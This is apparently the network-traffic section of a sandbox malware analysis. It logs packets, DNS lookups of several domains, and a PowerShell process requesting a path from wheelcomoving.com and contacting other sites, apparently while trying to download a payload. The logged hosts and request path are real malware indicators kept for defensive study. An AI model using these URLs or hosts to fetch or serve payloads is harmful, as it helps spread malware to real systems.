                                              Jan 7, 2021 11:47:31.502523899 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502563000 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502564907 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502602100 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502640009 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502645969 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502676010 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502712011 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502727985 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502757072 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502794027 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502804995 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502830029 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502865076 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.502866983 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.502933979 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.503002882 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.504120111 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.504218102 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.504256010 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.504292965 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.504297972 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.504370928 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.532478094 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.532525063 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.532561064 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.532598972 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.532608032 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.532696962 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.652972937 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653086901 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653127909 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653167009 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653203011 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653249025 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653280973 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653317928 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653388023 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653424025 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653485060 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653522968 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653558969 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653572083 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653597116 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653633118 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653657913 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653680086 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653717041 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653719902 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653757095 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653790951 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653793097 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653831005 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653865099 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653866053 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653903008 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.653968096 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.653995991 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654083014 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654088020 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654122114 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654158115 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654194117 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654202938 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654243946 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654266119 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654278994 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654315948 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654339075 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654352903 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654387951 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654422045 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654423952 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654463053 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654486895 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.654509068 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.654578924 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.682523012 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682576895 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682614088 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682651043 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682687044 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682703018 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.682723999 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682763100 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.682786942 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682833910 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.682852030 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.804532051 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804601908 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804630995 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804660082 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804687977 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:31.804902077 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:31.967391014 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.205476046 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.205780029 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.221276045 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.459502935 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.459527969 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.459537029 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.459728003 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.489032984 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.489552975 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.728533030 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.728635073 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.729115009 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.965648890 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.965740919 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.967442989 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.967472076 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:33.133694887 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:33.242974997 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:33.701493025 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:33.701587915 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:34.335038900 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:34.653718948 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:34.654067993 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:35.140860081 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:35.141032934 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:36.737791061 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:38.089169025 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:38.089262962 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:41.543003082 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:42.223583937 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:43.909363985 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:43.909580946 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:51.153222084 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:55.429168940 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:55.429406881 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:48:02.085269928 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:48:02.085700989 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:48:02.089286089 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:48:02.192666054 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.245681047 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.245809078 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.246941090 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.299884081 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.300060034 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.300092936 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.300175905 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.302309990 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.303016901 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.328140020 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:48:02.355345964 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.355967999 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.356057882 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.356523991 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.409719944 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.409765959 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.409813881 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.409943104 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.411711931 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.464648008 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.779172897 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:02.982613087 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:02.982841015 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:02.983000040 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:03.185878992 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:04.653371096 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:48:05.069173098 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069231987 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069273949 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069402933 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069453001 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069499016 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069529057 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069533110 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.069559097 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069598913 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069601059 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.069643021 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069674969 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.069690943 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.272717953 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.272751093 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.272862911 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.272902966 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.272918940 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.272984028 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.273067951 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.273144007 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.273220062 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.273308039 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.273396969 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.273483992 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.273494005 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.273637056 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.273727894 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.273746967 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.273813963 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.273883104 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.274009943 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.274065018 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.274158001 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.274203062 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.274290085 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.274352074 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.274405003 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.274553061 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.274620056 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.274703979 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.274739027 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.274799109 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.476958036 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477060080 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477107048 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477154970 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477206945 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477288008 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.477325916 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.477339983 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477427006 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477507114 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.477546930 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477658987 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.477693081 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477737904 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477792025 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.477811098 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.477986097 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.478080034 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.478157997 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.478208065 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.478276014 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.478333950 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.478444099 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.478519917 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.478528023 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.478627920 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.478705883 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.478797913 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.478846073 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.478909969 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.478982925 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.479012012 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.479077101 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.664499998 CET49173443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:05.824990034 CET4434917335.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:05.825227022 CET49173443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:05.825822115 CET49173443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:05.985975981 CET4434917335.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:05.986038923 CET4434917335.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:05.986054897 CET4434917335.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:05.986419916 CET49173443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:05.989830017 CET49173443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:05.991049051 CET49174443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:06.142611027 CET4434917435.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:06.142874002 CET49174443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:06.143543005 CET49174443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:06.149971962 CET4434917335.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:06.295026064 CET4434917435.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:06.295073986 CET4434917435.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:06.295101881 CET4434917435.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:06.295247078 CET49174443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:06.298587084 CET49174443192.168.2.2235.209.78.196
                                              Jan 7, 2021 11:48:06.338192940 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:06.449853897 CET4434917435.209.78.196192.168.2.22
                                              Jan 7, 2021 11:48:10.358536959 CET49168443192.168.2.2258.97.195.135

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 7, 2021 11:47:05.572349072 CET5219753192.168.2.228.8.8.8
                                              Jan 7, 2021 11:47:05.794960022 CET53521978.8.8.8192.168.2.22
                                              Jan 7, 2021 11:47:07.393898010 CET5309953192.168.2.228.8.8.8
                                              Jan 7, 2021 11:47:08.405873060 CET5309953192.168.2.228.8.8.8
                                              Jan 7, 2021 11:47:08.775882959 CET53530998.8.8.8192.168.2.22
                                              Jan 7, 2021 11:47:08.799792051 CET53530998.8.8.8192.168.2.22
                                              Jan 7, 2021 11:47:29.824919939 CET5283853192.168.2.228.8.8.8
                                              Jan 7, 2021 11:47:29.988394976 CET53528388.8.8.8192.168.2.22
                                              Jan 7, 2021 11:47:31.815952063 CET6120053192.168.2.228.8.8.8
                                              Jan 7, 2021 11:47:31.966275930 CET53612008.8.8.8192.168.2.22
                                              Jan 7, 2021 11:48:02.117172956 CET4954853192.168.2.228.8.8.8
                                              Jan 7, 2021 11:48:02.191674948 CET53495488.8.8.8192.168.2.22
                                              Jan 7, 2021 11:48:02.419569016 CET5562753192.168.2.228.8.8.8
                                              Jan 7, 2021 11:48:02.777923107 CET53556278.8.8.8192.168.2.22
                                              Jan 7, 2021 11:48:05.491617918 CET5600953192.168.2.228.8.8.8
                                              Jan 7, 2021 11:48:05.663836956 CET53560098.8.8.8192.168.2.22

                                              ICMP Packets

                                              TimestampSource IPDest IPChecksumCodeType
                                              Jan 7, 2021 11:47:08.799891949 CET192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                              Jan 7, 2021 11:47:32.773394108 CET58.97.195.135192.168.2.22bdc0(Host unreachable)Destination Unreachable
                                              Jan 7, 2021 11:47:32.773433924 CET58.97.195.135192.168.2.22bdc0(Host unreachable)Destination Unreachable
                                              Jan 7, 2021 11:47:38.088825941 CET58.97.195.135192.168.2.22bdc0(Host unreachable)Destination Unreachable
                                              Jan 7, 2021 11:47:38.088840961 CET58.97.195.135192.168.2.22bdcc(Host unreachable)Destination Unreachable
                                              Jan 7, 2021 11:47:39.372826099 CET58.97.195.135192.168.2.22bdcc(Host unreachable)Destination Unreachable
                                              Jan 7, 2021 11:47:42.622669935 CET58.97.195.135192.168.2.22bdc0(Host unreachable)Destination Unreachable
                                              Jan 7, 2021 11:47:58.632180929 CET58.97.195.135192.168.2.22bdcc(Host unreachable)Destination Unreachable
                                              Jan 7, 2021 11:48:13.482003927 CET58.97.195.135192.168.2.22bdc0(Host unreachable)Destination Unreachable

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Jan 7, 2021 11:47:05.572349072 CET192.168.2.228.8.8.80x71ddStandard query (0)wheelcomoving.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 11:47:07.393898010 CET192.168.2.228.8.8.80x8b68Standard query (0)00zyku.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 11:47:08.405873060 CET192.168.2.228.8.8.80x8b68Standard query (0)00zyku.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 11:47:29.824919939 CET192.168.2.228.8.8.80xc229Standard query (0)ketoresetme.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 11:47:31.815952063 CET192.168.2.228.8.8.80xc6ccStandard query (0)rycomputer.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 11:48:02.117172956 CET192.168.2.228.8.8.80xd92dStandard query (0)d-cem.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 11:48:02.419569016 CET192.168.2.228.8.8.80x62a5Standard query (0)thebestfikrah.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 11:48:05.491617918 CET192.168.2.228.8.8.80x194aStandard query (0)phawayagency.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Jan 7, 2021 11:47:05.794960022 CET8.8.8.8192.168.2.220x71ddNo error (0)wheelcomoving.com66.85.46.76A (IP address)IN (0x0001)
                                              Jan 7, 2021 11:47:08.775882959 CET8.8.8.8192.168.2.220x8b68No error (0)00zyku.com193.187.117.26A (IP address)IN (0x0001)
                                              Jan 7, 2021 11:47:08.799792051 CET8.8.8.8192.168.2.220x8b68No error (0)00zyku.com193.187.117.26A (IP address)IN (0x0001)
                                              Jan 7, 2021 11:47:29.988394976 CET8.8.8.8192.168.2.220xc229No error (0)ketoresetme.com70.32.23.58A (IP address)IN (0x0001)
                                              Jan 7, 2021 11:47:31.966275930 CET8.8.8.8192.168.2.220xc6ccNo error (0)rycomputer.com58.97.195.135A (IP address)IN (0x0001)
                                              Jan 7, 2021 11:48:02.191674948 CET8.8.8.8192.168.2.220xd92dNo error (0)d-cem.com35.214.169.246A (IP address)IN (0x0001)
                                              Jan 7, 2021 11:48:02.777923107 CET8.8.8.8192.168.2.220x62a5No error (0)thebestfikrah.com103.8.25.63A (IP address)IN (0x0001)
                                              Jan 7, 2021 11:48:05.663836956 CET8.8.8.8192.168.2.220x194aNo error (0)phawayagency.com35.209.78.196A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • wheelcomoving.com
                                              • ketoresetme.com
                                              • thebestfikrah.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.224916566.85.46.7680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 7, 2021 11:47:05.965092897 CET0OUTGET /p/RuMeRPa/ HTTP/1.1
                                              Host: wheelcomoving.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 11:47:07.069713116 CET1INHTTP/1.1 404 Not Found
                                              Date: Thu, 07 Jan 2021 10:47:06 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/"
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, Keep-Alive
                                              Vary: Accept-Encoding
                                              Keep-Alive: timeout=5, max=100
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 31 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 0d 0a
                                              Data Ascii: 17<!DOCTYPE html><html
                                              Jan 7, 2021 11:47:07.069770098 CET1INData Raw: 31 62 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 0d 0a 09 0d 0a 31 37 38 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 68 65 65
                                              Data Ascii: 1blang="en-US"><head>178<link rel="shortcut icon" href="https://wheelcomoving.com/wp-content/uploads/2015/12/Transportation-16x16-1.png" type="image/x-icon"><meta charset="UTF-8"><meta name="viewport" content="width=device-wi
                                              Jan 7, 2021 11:47:07.069837093 CET1INData Raw: 33 36 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 68 65 65 6c 20 43 6f 20 4d 6f 76 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 0d 0a
                                              Data Ascii: 36<title>Page not found &#8211; Wheel Co Moving</title>
